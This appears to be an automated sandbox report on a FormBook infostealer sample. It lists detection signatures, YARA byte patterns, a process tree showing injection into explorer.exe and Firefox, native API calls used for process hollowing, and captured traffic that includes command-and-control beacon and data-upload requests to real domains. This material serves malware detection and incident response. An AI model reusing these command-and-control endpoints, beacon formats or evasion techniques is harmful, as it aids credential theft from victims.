Loading ...

Play interactive tourEdit tour

Analysis Report ScanRFQ_569585.exe

Overview

General Information

Sample Name:ScanRFQ_569585.exe
MD5:fff36af0c29e1e45b4ed519f0e7dfbfb
SHA1:af7cb2dc654e284e0a4902d9e1ab7edf6bee506c
SHA256:a83ded2c7e7d33354eb933f465d2e300c1047bb8470b3bc7beb7dae83228b3e0

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • ScanRFQ_569585.exe (PID: 3772 cmdline: 'C:\Users\user\Desktop\ScanRFQ_569585.exe' MD5: FFF36AF0C29E1E45B4ED519F0E7DFBFB)
    • explorer.exe (PID: 1216 cmdline: MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
      • autochk.exe (PID: 3860 cmdline: C:\Windows\System32\autochk.exe MD5: F88A52EB62019D6A62FDD9E08034DBD8)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 3880 cmdline: /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • firefox.exe (PID: 4036 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: 594F91C5985AC402ECD2D7F1376AFFFD)
      • winb2k.exe (PID: 4056 cmdline: C:\Program Files\Modpl\winb2k.exe MD5: FFF36AF0C29E1E45B4ED519F0E7DFBFB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.963764041.00B60000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.963764041.00B60000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x817b9:$sqlite3step: 68 34 1C 7B E1
    • 0x818cc:$sqlite3step: 68 34 1C 7B E1
    • 0x817e8:$sqlite3text: 68 38 2A 90 C5
    • 0x8190d:$sqlite3text: 68 38 2A 90 C5
    • 0x817fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x81923:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.963764041.00B60000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x73248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x734b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7eb35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x7e621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x7ec37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x7edaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x7402a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x7d89c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x749c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x83ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x84eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.733297708.000D4000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.733297708.000D4000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x161b1:$sqlite3step: 68 34 1C 7B E1
      • 0x162c4:$sqlite3step: 68 34 1C 7B E1
      • 0x161e0:$sqlite3text: 68 38 2A 90 C5
      • 0x16305:$sqlite3text: 68 38 2A 90 C5
      • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
      • 0x1631b:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 7 entries

      Sigma Overview


      System Summary:

      barindex
      Sigma detected: File Created with System Process NameShow sources
      Source: File createdAuthor: Sander Wiebing: Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 1216, TargetFilename: C:\Users\user\AppData\Local\Temp\Modpl

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: www.towing-oxnard.comVirustotal: Detection: 6%Perma Link
      Source: http://www.chilogae.com/q44/Virustotal: Detection: 6%Perma Link
      Source: http://www.towing-oxnard.comVirustotal: Detection: 6%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Program Files\Modpl\winb2k.exeVirustotal: Detection: 84%Perma Link
      Source: C:\Program Files\Modpl\winb2k.exeReversingLabs: Detection: 74%
      Source: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exeVirustotal: Detection: 84%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exeReversingLabs: Detection: 74%
      Multi AV Scanner detection for submitted fileShow sources
      Source: ScanRFQ_569585.exeVirustotal: Detection: 84%Perma Link
      Source: ScanRFQ_569585.exeReversingLabs: Detection: 74%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Program Files\Modpl\winb2k.exeJoe Sandbox ML: detected
      Source: C:\Program Files\Modpl\winb2k.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: ScanRFQ_569585.exeJoe Sandbox ML: detected

      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 4x nop then jmp 0243B9BEh0_2_023A45E6
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 4x nop then jmp 023B7098h0_2_023B7072
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi8_2_00BDF870
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop ebx8_2_00BD1050
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi8_2_00BE09B9
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi8_2_00BD79A0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi8_2_00BD799B
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi8_2_00BE09C0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop esi8_2_00BE03D0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi8_2_00BE0B79
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi8_2_00BE0B77

      Source: global trafficHTTP traffic detected: GET /q44/?2d3DUfw0=4Ih2eMp+f/37MhBpkS5xp23hk1Pa4taZMcF4C66VkQnB59o9kPrcve7f/V92cg7usAs5Jw==&1b=v01L_rWpTzu0 HTTP/1.1Host: www.towing-oxnard.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /q44/?2d3DUfw0=Gr8IwLa7RqsgrihTvqDsVY5skmR0Y5HSw0/AoDPiUQ1S9e8T86NEm74RfyN6xMX4+Cl88A==&1b=v01L_rWpTzu0&sql=1 HTTP/1.1Host: www.schoolpsych4u.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 35.242.251.130 35.242.251.130
      Source: Joe Sandbox ViewIP Address: 35.242.251.130 35.242.251.130
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: GET /q44/?2d3DUfw0=4Ih2eMp+f/37MhBpkS5xp23hk1Pa4taZMcF4C66VkQnB59o9kPrcve7f/V92cg7usAs5Jw==&1b=v01L_rWpTzu0 HTTP/1.1Host: www.towing-oxnard.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /q44/?2d3DUfw0=Gr8IwLa7RqsgrihTvqDsVY5skmR0Y5HSw0/AoDPiUQ1S9e8T86NEm74RfyN6xMX4+Cl88A==&1b=v01L_rWpTzu0&sql=1 HTTP/1.1Host: www.schoolpsych4u.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.congresoflebologia.com
      Source: unknownHTTP traffic detected: POST /q44/ HTTP/1.1Host: www.schoolpsych4u.comConnection: closeContent-Length: 165826Cache-Control: no-cacheOrigin: http://www.schoolpsych4u.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.schoolpsych4u.com/q44/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 33 44 55 66 77 30 3d 4f 4a 77 79 75 73 75 4b 50 4d 4d 59 6e 32 30 69 71 4f 4b 78 43 38 5a 53 6b 31 35 6d 59 5a 48 41 69 45 6d 78 78 33 65 39 64 54 39 7a 35 38 55 55 71 61 78 47 30 5f 35 71 44 6c 64 5f 73 65 54 70 28 7a 67 62 70 46 70 51 4c 67 74 58 7e 55 51 77 37 42 37 6f 30 52 76 65 52 50 76 58 33 6b 54 71 68 43 65 33 70 41 42 49 4a 59 6d 49 74 64 71 6d 6b 71 7e 43 5a 53 30 4e 61 78 6a 64 4a 47 63 31 43 62 36 49 6d 51 7e 43 64 66 71 51 6b 41 44 5a 68 38 56 43 4c 5a 34 39 4f 46 59 5f 70 5a 71 6c 47 72 34 77 70 76 54 63 46 52 68 55 46 50 50 7a 44 53 34 2d 6e 31 7a 2d 6e 46 57 58 77 57 54 56 45 4f 39 50 63 48 76 61 51 63 49 44 67 38 62 67 33 6d 79 4f 74 4c 56 39 6d 59 4d 64 55 59 77 5f 41 57 4b 73 6c 6c 4b 69 51 78 63 66 33 45 4f 55 48 30 42 7a 6d 36 6c 62 28 48 4f 36 44 5a 7e 61 33 37 33 49 74 37 52 64 33 5a 67 70 64 39 66 55 6f 77 76 36 4b 79 4f 58 69 72 73 66 4c 71 6a 4d 6a 5f 6d 5f 72 52 6c 67 61 31 32 51 47 4e 38 62 4c 65 6c 50 79 55 64 6b 6d 5f 6e 6c 58 4a 58 6d 71 4a 78 66 61 49 49 57 53 4c 39 7a 65 53 79 75 61 39 61 50 37 65 61 56 6b 72 67 45 47 2d 78 51 52 55 44 49 6d 48 33 45 67 79 78 6f 58 64 51 30 48 46 64 44 75 33 76 46 48 4a 30 7a 48 76 34 30 51 67 64 41 6f 4f 43 59 44 43 79 4c 4a 4a 41 64 4b 34 68 4b 6c 6b 61 6c 73 4d 59 6c 36 54 69 37 6c 5f 42 34 32 51 64 46 66 53 37 45 43 6e 41 4e 37 42 62 42 6c 7a 4f 74 4f 69 41 30 65 35 78 31 66 7a 4c 37 65 51 6e 76 32 72 70 6d 4d 30 4e 56 32 58 7a 4e 61 6b 6d 77 59 4f 42 5a 52 76 38 32 57 44 67 6e 56 72 52 44 49 73 34 50 45 56 32 45 36 44 77 6a 5a 6c 6f 74 57 45 4c 53 6e 70 67 31 65 44 7a 63 7a 34 54 4f 6b 59 58 5f 50 65 78 50 57 5f 31 44 39 55 31 64 30 71 6e 56 66 32 7a 67 4b 4f 59 59 77 59 41 32 65 59 68 69 4a 64 72 61 48 63 7e 6a 47 72 74 31 66 4c 75 43 68 6d 68 4c 55 65 5a 58 69 78 36 46 68 42 34 30 38 52 56 34 67 50 4b 55 63 42 35 35 6c 65 73 52 47 7a 54 4d 65 57 61 47 67 52 30 4a 74 74 76 47 55 4a 71 35 45 75 45 77 75 43 39 35 45 4d 43 54 50 57 64 50 72 54 53 57 4d 59 65 34 7a 31 4c 6f 50 6d 66 50 6a 59 57 79 4b 76 50 42 45 43 72 32 4e 64 52 36 51 69 36 30 75 35 50 67 6b 6d 43 62 4c 45 48 4f 36 7a 71 43 39 62 55 56 34 34 79 47 28 4a 6e 71 7a 65 65 4c 7e 78 45 31 6c 50 7a 48 34 52 63 55 7e 73 41 31 6d 6c 47 71 32 49 70 65 4f 4d 44 66 75 32 76 72 50 62 30 74 6f 4d 63 6c 65 46 35 71 79 53 41 58 70 62 73 74 59 61 54 51 79 72 4e 72 6c 52 78 31 6c 59 75 37 53 56 73 4d 76 39 47 71 4a 38 39 6d 72 53 56 6d 4a 50 54 4a 37 48 33 6a 4f 43 32 68 65 4b 6b 33 66 45 72 52 4c 30 53 66 74 72 48 38 56 69 71 7a 30 74 74 63 58 57 6f 73 48 39 35 55 32 4c 49 63 77 57 75 31 64 6a 50 4b 56 45 48 32 65 43 54 46 39
      Source: explorer.exe, 00000002.00000000.697309641.03A10000.00000008.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000002.00000000.691785582.01ED0000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.400wd.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.400wd.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.400wd.com/q44/www.dgtydl2011.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.400wd.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.blitzcart.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.blitzcart.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.blitzcart.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.chilogae.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.chilogae.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.chilogae.com/q44/www.t1syn.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.chilogae.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.cizgiturk.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.cizgiturk.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.cizgiturk.com/q44/www.pcrtn.info
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.cizgiturk.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.congresoflebologia.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.congresoflebologia.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.congresoflebologia.com/q44/www.towing-oxnard.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.congresoflebologia.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.devenirmusulman.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.devenirmusulman.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.devenirmusulman.com/q44/www.400wd.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.devenirmusulman.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.dgtydl2011.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.dgtydl2011.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.dgtydl2011.com/q44/www.samhallsbyggnad.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.dgtydl2011.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.hehushen.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.hehushen.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.hehushen.com/q44/www.blitzcart.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.hehushen.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.individualbusinessbuilder.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.individualbusinessbuilder.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.individualbusinessbuilder.com/q44/www.devenirmusulman.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.individualbusinessbuilder.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.opebet946.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.opebet946.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.opebet946.com/q44/www.chilogae.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.opebet946.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.pcrtn.info
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.pcrtn.info/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.pcrtn.info/q44/www.opebet946.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.pcrtn.infoReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.samhallsbyggnad.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.samhallsbyggnad.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.samhallsbyggnad.com/q44/www.talentedentertainers.info
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.samhallsbyggnad.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.schoolpsych4u.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.schoolpsych4u.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.schoolpsych4u.com/q44/www.individualbusinessbuilder.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.schoolpsych4u.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.t1syn.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.t1syn.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.t1syn.com/q44/www.hehushen.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.t1syn.comReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.talentedentertainers.info
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.talentedentertainers.info/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.talentedentertainers.info/q44/www.cizgiturk.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.talentedentertainers.infoReferer:
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.towing-oxnard.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.towing-oxnard.com/q44/
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.towing-oxnard.com/q44/www.schoolpsych4u.com
      Source: explorer.exe, 00000002.00000002.1117272656.02DE0000.00000004.00000001.sdmpString found in binary or memory: http://www.towing-oxnard.comReferer:
      Source: firefox.exe, 00000008.00000002.963731280.007FF000.00000004.00000001.sdmpString found in binary or memory: https://www.towing-oxnard.com/q44/?2d3DUfw0=4Ih2eMp

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\System32\cmd.exeDropped file: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogri.iniJump to dropped file
      Source: C:\Windows\System32\cmd.exeDropped file: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogrv.iniJump to dropped file
      Source: C:\Program Files\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogrf.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6070 NtResumeThread,NtResumeThread,0_2_023B6070
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6130 NtSetContextThread,NtSetContextThread,0_2_023B6130
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6460 NtSuspendThread,NtSuspendThread,0_2_023B6460
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6580 NtUnmapViewOfSection,NtUnmapViewOfSection,0_2_023B6580
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,0_2_023B4E30
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,0_2_023B4EA0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B52B0 NtCreateSection,NtCreateSection,0_2_023B52B0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5390 NtDelayExecution,NtDelayExecution,0_2_023B5390
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5090 NtClose,NtClose,0_2_023B5090
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5190 NtCreateFile,NtCreateFile,0_2_023B5190
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B57F0 NtMapViewOfSection,NtMapViewOfSection,0_2_023B57F0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B55A0 NtFreeVirtualMemory,0_2_023B55A0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5E40 NtQueueApcThread,NtQueueApcThread,0_2_023B5E40
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5E80 NtReadFile,NtReadFile,0_2_023B5E80
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5EC0 NtReadVirtualMemory,NtReadVirtualMemory,0_2_023B5EC0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5C10 NtQueryInformationProcess,NtQueryInformationProcess,0_2_023B5C10
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5DC0 NtQuerySystemInformation,NtQuerySystemInformation,0_2_023B5DC0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6200 NtSetInformationFile,0_2_023B6200
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B63D0 NtSetValueKey,0_2_023B63D0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6630 NtWriteFile,0_2_023B6630
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6660 NtWriteVirtualMemory,0_2_023B6660
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B65E0 NtWaitForSingleObject,0_2_023B65E0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5210 NtCreateMutant,0_2_023B5210
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B5270 NtCreateProcessEx,0_2_023B5270
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B51D0 NtCreateKey,0_2_023B51D0
